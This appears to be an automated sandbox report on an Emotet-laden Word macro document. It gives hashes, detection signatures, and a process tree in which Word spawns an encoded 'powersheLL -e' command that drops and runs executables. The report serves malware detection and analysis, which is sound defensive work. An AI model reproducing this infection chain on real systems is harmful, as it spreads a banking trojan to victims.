Analysis

  • max time kernel: 127s
  • max time network: 155s
  • platform: windows7_x64
  • resource: win7
  • submitted: 29-07-2020 07:17

General

  • Target: emotet_e1_7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9_2020-07-29__071700._doc.doc
  • Size: 172KB
  • MD5: 2e5604fc710cb5f7d0802eed16d9974b
  • SHA1: 1d3b14e0647a32071714a9c318e7ba88fcac9b36
  • SHA256: 7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9
  • SHA512: 58104d7c98bd3dcaf7d32b8ab75c3051ba1ce631f38e84ad5dba74319d364d88f9d9efafb54508ea7dbf9812af4dce2a5dc2ab61f74dd2b6d04a7e5d8df7056e

Score: 10/10

Malware Config

Extracted

Language: ps1
Source: URLs

Extracted

Family: emotet

C2


rsa_pubkey.plain

Signatures

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Drops file in System32 directory 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_7874a727f8ba83b97c4889bdde4b39fe644e52279b8f25336c1f7b03ee7ea5b9_2020-07-29__071700._doc.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1464
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e 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
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    PID:1768
  • C:\Users\Admin\903.exe
    C:\Users\Admin\903.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1132
    • C:\Windows\SysWOW64\KBDCZ2\dbnmpntw.exe
      "C:\Windows\SysWOW64\KBDCZ2\dbnmpntw.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:1564

Downloads

  • memory/1132-12-0x00000000002E0000-0x00000000002EC000-memory.dmp (Filesize: 48KB)
  • memory/1464-2-0x00000000087E0000-0x00000000087E4000-memory.dmp (Filesize: 16KB)
  • memory/1464-4-0x0000000006C60000-0x0000000006E60000-memory.dmp (Filesize: 2.0MB)
  • memory/1464-5-0x000000000AD30000-0x000000000AD34000-memory.dmp (Filesize: 16KB)
  • memory/1464-6-0x000000000BDB0000-0x000000000BDB4000-memory.dmp (Filesize: 16KB)
  • memory/1464-9-0x0000000002100000-0x0000000002101000-memory.dmp (Filesize: 4KB)
  • memory/1564-15-0x00000000001F0000-0x00000000001FC000-memory.dmp (Filesize: 48KB)